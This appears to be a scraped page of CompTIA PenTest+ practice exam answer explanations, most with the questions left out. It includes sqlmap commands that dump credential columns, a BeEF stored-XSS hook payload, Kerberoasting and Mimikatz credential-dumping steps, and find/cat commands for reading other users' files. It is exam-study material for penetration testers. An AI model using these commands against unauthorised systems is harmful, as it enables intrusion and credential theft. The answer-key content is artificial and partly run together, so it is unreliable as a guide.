PT0-003 CompTIA PenTest+ Exam Free Practice Exam Questions (2026 Updated)

To enumerate password hashes using an SQL injection vulnerability, the penetration tester needs to extract specific columns from the database that typically contain password hashes. The --dump command in sqlmap is used to dump the contents of the specified database table. Here’s a breakdown of the options:

Option A: sqlmap -u www.example.com/?id=1 --search -T user

The --search option is used to search for columns and not to dump data. This would not enumerate password hashes.

Option B: sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred

This command uses --dump to extract data from the specified database accounts, table users, and column cred. This is the correct option to enumerate password hashes, assuming cred is the column containing the password hashes.

Option C: sqlmap -u www.example.com/?id=1 --tables -D accounts

The --tables option lists all tables in the specified database but does not extract data.

Option D: sqlmap -u www.example.com/?id=1 --schema --current-user --current-db

The --schema option provides the database schema information, and --current-user and --current-db provide information about the current user and database but do not dump data.

References from Pentest:

Writeup HTB: Demonstrates using sqlmap to dump data from specific tables to retrieve sensitive information, including password hashes​​.

Luke HTB: Shows the process of exploiting SQL injection to extract user credentials and hashes by dumping specific columns from the database​​.

======

The correct answer is B. Use BeEF and insert payload < script src= " http:// < tester-IP > :3000/hook.js " >

BeEF, the Browser Exploitation Framework, is specifically designed to exploit client-side browser vulnerabilities and control browsers that load a malicious JavaScript hook. In a stored XSS scenario, inserting the BeEF hook script into a vulnerable comment form causes any user who views the comment to load the attacker-controlled JavaScript.

The payload:

< script src= " http:// < tester-IP > :3000/hook.js " >

loads BeEF’s hook script from the tester’s system. Once the victim browser executes the script, the browser becomes “hooked,” allowing the tester to perform browser-based post-exploitation actions within the authorized scope of the engagement.

A is incorrect because Evilginx is mainly used for adversary-in-the-middle phishing and credential/session capture, not for controlling browsers through stored XSS.

C is incorrect because a Netcat listener and an iframe pointing to /bin/bash will not create a browser reverse shell. Browsers cannot execute /bin/bash on the victim host simply through an iframe.

D is incorrect because the listed Metasploit module and image tag do not represent the standard method for hooking browsers through stored XSS.

In PenTest+ terms, this falls under Attacks and Exploits, specifically stored cross-site scripting and browser exploitation using JavaScript-based payloads.

STRIDE is a threat classification model created by Microsoft that breaks down threats into six categories:

Spoofing

Tampering

Repudiation

Information disclosure

Denial of Service

Elevation of privilege

It is specifically designed for threat modeling.

PTES is a general pentesting methodology.

OSSTMM is a framework for operational security testing.

OCTAVE is a risk assessment methodology, not focused on threat classification.

The Wayback Machine is an online tool that archives web pages over time, allowing users to see how a website looked at various points in its history. This can be extremely useful for penetration testers looking to explore potential security weaknesses by searching for subdomains that might have existed in the past.

Accessing the Wayback Machine:

Go to the Wayback Machine website: archive.org/web.

Enter the URL of the target website you want to explore.

Navigating Archived Pages:

The Wayback Machine provides a timeline and calendar interface to browse through different snapshots taken over time.

Select a snapshot to view the archived version of the site. Look for links, subdomains, and resources that may no longer be available in the current version of the website.

Identifying Subdomains:

Examine the archived pages for references to subdomains, which might be visible in links, scripts, or embedded content.

Use the information gathered to identify potential entry points or older versions of web applications that might still be exploitable.

Tool Integration:

Tools like Burp Suite or SpiderFoot can integrate with the Wayback Machine to automate the discovery process of archived subdomains and resources.

Real-World Example:

During a penetration test, a tester might find references to oldadmin.targetsite.com in an archived page from several years ago. This subdomain might no longer be listed in DNS but could still be accessible, leading to potential security vulnerabilities.

References from Pentesting Literature:

In various penetration testing guides and HTB write-ups, using the Wayback Machine is a common technique for passive reconnaissance, providing historical context and revealing past configurations that might still be exploitable.

Step-by-Step ExplanationReferences:

HTB Official Writeups

======

Kerberoasting is an attack that involves requesting service tickets for service accounts from a Kerberos service, extracting the service tickets, and attempting to crack them offline to retrieve the plaintext passwords.

Understanding Kerberoasting:

Purpose: To obtain service account passwords by cracking the encrypted service tickets (TGS tickets) offline.

Service Principal Names (SPNs): SPNs are used in Kerberos authentication to uniquely identify a service instance.

Command Breakdown:

setspn.exe -Q /: This command queries all SPNs in the domain.

Use Case: Identifying accounts with SPNs that can be targeted for Kerberoasting.

Kerberoasting Steps:

Identify SPNs: Use setspn.exe to list service accounts with SPNs.

Request TGS Tickets: Request TGS tickets for the identified SPNs.

Extract Tickets: Use tools like Mimikatz to extract the service tickets.

Crack Tickets: Use password cracking tools like Hashcat to crack the extracted tickets offline.

References from Pentesting Literature:

Kerberoasting is a well-documented attack method in penetration testing guides, specifically targeting service accounts in Active Directory environments.

HTB write-ups often detail the use of Kerberoasting for gaining credentials from service accounts.

Step-by-Step ExplanationReferences:

Penetration Testing - A Hands-on Introduction to Hacking

HTB Official Writeups

======

When a penetration tester identifies several unused services listening on targeted internal laptops, the most appropriate recommendation to reduce the risk of compromise is system hardening. Here ' s why:

System Hardening:

Purpose: System hardening involves securing systems by reducing their surface of vulnerability. This includes disabling unnecessary services, applying security patches, and configuring systems securely.

Impact: By disabling unused services, the attack surface is minimized, reducing the risk of these services being exploited by attackers.

Comparison with Other Controls:

Multifactor Authentication (A): While useful for securing authentication, it does not address the issue of unused services running on the system.

Patch Management (B): Important for addressing known vulnerabilities but not specifically related to disabling unused services.

Network Segmentation (D): Helps in containing breaches but does not directly address the issue of unnecessary services.

System hardening is the most direct control for reducing the risk posed by unused services, making it the best recommendation.

======

OpenID Connect (OIDC) with OAuth allows applications to authenticate users using third-party identity providers (IdPs). If dynamic registration is enabled, attackers can abuse this feature to capture and replay authentication requests.

Replay attack (Option C):

Attackers capture legitimate authentication tokens and reuse them to impersonate users.

OIDC uses JWTs (JSON Web Tokens), which may not expire quickly, making replay attacks highly effective.

If a wireless network uses weak encryption (e.g., WEP), attackers can capture and analyze packets to extract sensitive data.

Packet sniffing (Option C):

Tools like Wireshark, Aircrack-ng, and Kismet capture network packets.

Attackers analyze captured traffic to decrypt WEP encryption or extract plaintext credentials.

DIR_MODE=0777 configures new home directories to be created world-readable, world-writable, and world-executable (rwxrwxrwx). With such permissive permissions, any unprivileged local user can traverse into other users’ home directories, list files, read them, and even modify or replace them. That makes exposure of other users’ sensitive data the most likely and immediate outcome once the tester has any local user account.

Why the other options are less likely:

B. Unauthorized sudo execution: Requires membership in sudo/wheel or explicit entries in /etc/sudoers. Nothing in the snippet indicates that, and file mode on home dirs doesn’t grant sudo.

C. Hijacking default login shells: DSHELL=/bin/zsh only sets the default shell for new users. Replacing /bin/zsh or altering /etc/passwd would require root.

D. Corrupting the skeleton configuration: SKEL=/etc/systemd-conf/temp-skeleton is under /etc/…, which is root-owned on standard systems. A normal user cannot write there, so “corrupting the skeleton” is unlikely without privilege escalation.

Practical exploitation as a non-privileged user (illustrative):

# Find world-writable homes

find /home -maxdepth 1 -type d -perm -0002 -ls

# Read another user ' s files

cd /home/targetuser & & ls -la & & cat Documents/tax_return.pdf

(Depending on per-file permissions.)

CompTIA PenTest+ PT0-003 Objective Mapping (for study):

Domain 3.0 Attacks and Exploits

3.1 Exploit system vulnerabilities and misconfigurations (e.g., insecure file permissions leading to data exposure/privilege abuse).

To detect all open ports and enumerate services, the tester needs to:

Use -sV (Service Version Detection)

Use -Pn (Disables ICMP ping to bypass firewalls)

Use -p- (Scans all 65,535 TCP ports)

nmap -sV -Pn -p- 10.10.10.10 (Option D):

This command performs full-port scanning, including high-numbered ports like 50123/tcp (ms-rpc).

Without -p-, high ports would be missed.

The smbclient tool is used to access SMB/CIFS resources on a network. It allows penetration testers to connect to shared resources and enumerate users on a network, particularly in Windows environments. While finger and rwho are more common on Unix/Linux systems, smbclient provides better functionality for enumerating users across a network.

Understanding smbclient:

Purpose: smbclient is used to access and manage files and directories on SMB/CIFS servers.

Capabilities: It allows for browsing shared resources, listing directories, downloading and uploading files, and enumerating users.

User Enumeration:

Command: Use smbclient with the -L option to list available shares and users.

Step-by-Step Explanationsmbclient -L //target_ip -U username

Example: Enumerating users on a target system.

smbclient -L //192.168.50.2 -U anonymous

Advantages:

Comprehensive: Provides detailed information about shared resources and users.

Cross-Platform: Can be used on both Linux and Windows systems.

References from Pentesting Literature:

SMB enumeration is a common practice discussed in penetration testing guides for identifying shared resources and users in a network environment.

HTB write-ups frequently mention the use of smbclient for enumerating network shares and users.

Tailgating is the term used to describe a situation where a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee.

Tailgating:

Definition: Tailgating occurs when an unauthorized person follows an authorized person into a restricted area without the latter’s consent or knowledge. The authorized person typically opens a door or checkpoint, and the unauthorized person slips in behind them.

Example: An attacker waits near the entrance of a building and enters right after an employee, bypassing security measures.

Physical Security:

Importance: Physical security is a crucial aspect of overall security posture. Tailgating exploits human factors and weaknesses in physical security controls.

Prevention: Security measures such as turnstiles, mantraps, and security personnel can help prevent tailgating.

Pentest References:

Physical Penetration Testing: Tailgating is a common technique used in physical penetration tests to assess the effectiveness of an organization’s physical security controls.

Social Engineering: Tailgating often involves social engineering, where the attacker relies on the politeness or unawareness of the employee to gain unauthorized access.

By understanding and using tailgating, penetration testers can evaluate the effectiveness of an organization’s physical security measures and identify potential vulnerabilities that could be exploited by malicious actors.

======

If a penetration tester gains access to a host but does not have a shell, the best tool for further enumeration is Netcat. Here’s why:

Netcat:

Versatility: Netcat is known as the " Swiss Army knife " of networking tools. It can be used for port scanning, banner grabbing, and setting up reverse shells.

Enumeration: Without a shell, Netcat can help enumerate open ports and services running on the host, providing insight into the host ' s environment.

Comparison with Other Tools:

ProxyChains: Used to chain proxies together, not directly useful for enumeration without an initial shell.

PowerShell ISE: Requires a shell to execute commands and scripts.

Process IDs: Without a shell, enumerating process IDs directly isn’t possible.

Netcat’s ability to perform multiple network-related tasks without needing a shell makes it the best choice for further enumeration.

======

For electronic locking mechanisms, traditional lock picking is ineffective. Instead, bypassing techniques are often used, such as:

Triggering the emergency release.

Using a shim or bypass tool.

Exploiting wiring faults or RFID vulnerabilities.

This method doesn’t involve human deception (impersonation), social engineering (tailgating), or causing interference (jamming). It focuses on exploiting the electronic door system without needing to " unlock " it traditionally.

CompTIA PenTest+ Reference:

PT0-003 Objective 1.3: Given a scenario, perform a physical assessment.

CompTIA emphasizes the distinction between bypassing and other physical intrusion methods.

The correct answer is C. python3 -m http.server 80

Using Python’s built-in HTTP server is one of the fastest and simplest ways to transfer files from a Linux host to another system on the same network. By running:

python3 -m http.server 80

from the directory containing the exploit, the tester can host the file over HTTP. The Windows 10 system can then retrieve it using a browser, PowerShell, certutil, or another HTTP-capable download method.

A, B, and D are incorrect because Netcat/Ncat listeners can be used for file transfer in some cases, but they require more coordination and commands on both systems. They are better suited for raw TCP connections, shells, or manual transfers, not the quickest general-purpose file-serving method.

In PenTest+ terms, this falls under Tools and Code Analysis, specifically using common command-line tools for file transfer during post-exploitation or controlled assessment activities.

The find command shown here recursively searches the entire filesystem (/) for files (-type f) and lists them with detailed information (-ls), including file ownership, group, size, and permissions. The results are then redirected into /tmp/recon.txt.

This is typically performed as part of post-exploitation local enumeration to gather information on:

Files and their permission settings.

Potential world-writable or sensitive files (e.g., /etc/shadow, SSH keys, config files).

Misconfigurations that could lead to privilege escalation.

Thus, the tester’s main objective is permission enumeration — identifying files and directories with insecure permissions that could be exploited.

Why not the others:

B. Secrets enumeration: While secrets might later be found in files, the command’s intent is general permission/file listing, not targeted secret extraction.

C. User enumeration: The command doesn’t list users or accounts (no /etc/passwd or who queries).

D. Service enumeration: This doesn’t inspect running services or open ports.

CompTIA PT0-003 Objective Mapping:

Domain 2.0: Information Gathering and Vulnerability Scanning

2.5: Perform local enumeration on compromised hosts (e.g., file and permission enumeration).

Given that the penetration tester has already obtained an internal foothold on the target network, the next logical step to achieve the objective of collecting confidential information and potentially exfiltrating data or performing a ransomware attack is to perform credential dumping. Here ' s why:

Credential Dumping:

Purpose: Credential dumping involves extracting password hashes and plaintext passwords from compromised systems. These credentials can be used to gain further access to sensitive data and critical systems within the network.

Tools: Common tools used for credential dumping include Mimikatz, Windows Credential Editor, and ProcDump.

Impact: With these credentials, the tester can move laterally across the network, escalate privileges, and access confidential information.

Comparison with Other Options:

Initiate a Social Engineering Campaign (A): Social engineering is typically an initial access technique rather than a follow-up action after gaining internal access.

Compromise an Endpoint (C): The tester already has a foothold, so compromising another endpoint is less direct than credential dumping for accessing sensitive information.

Share Enumeration (D): While share enumeration can provide useful information, it is less impactful than credential dumping in terms of gaining further access and achieving the main objective.

Performing credential dumping is the most effective next step to escalate privileges and access sensitive data, making it the best choice.

======

Given an insecure wireless network (e.g., open or poorly secured Wi-Fi), a practical initial access technique is to capture or poison name resolution/authentication requests from client systems once they are on that network. Responder is designed to perform LLMNR/NBT-NS/MDNS poisoning and capture NTLM authentication attempts and other credential material on a local network segment. On an insecure Wi-Fi network an attacker can either join the network or run a rogue AP and then run Responder to capture credentials from connected clients — a typical and effective initial-access method in such scenarios.

Why not the others:

B. Metasploit — a general exploitation framework; useful after finding a vulnerable service, but not specifically the most-likely initial tool on an insecure Wi-Fi.

C. Netcat — a raw TCP/UDP utility (listeners/shells); useful post-exploitation but not for capturing broadcast name resolution requests.

D. Nmap — a scanner to discover hosts/ports; helpful reconnaissance, but not directly used to capture credentials on a local insecure wireless segment.

CompTIA PT0-003 Mapping: Wireless/host-based attacks and network credential-capture techniques (evil twin/rogue AP and LLMNR/NetBIOS poisoning).

A screenshot of a computer Description automatically generated

A screenshot of a computer Description automatically generated

A screenshot of a computer Description automatically generated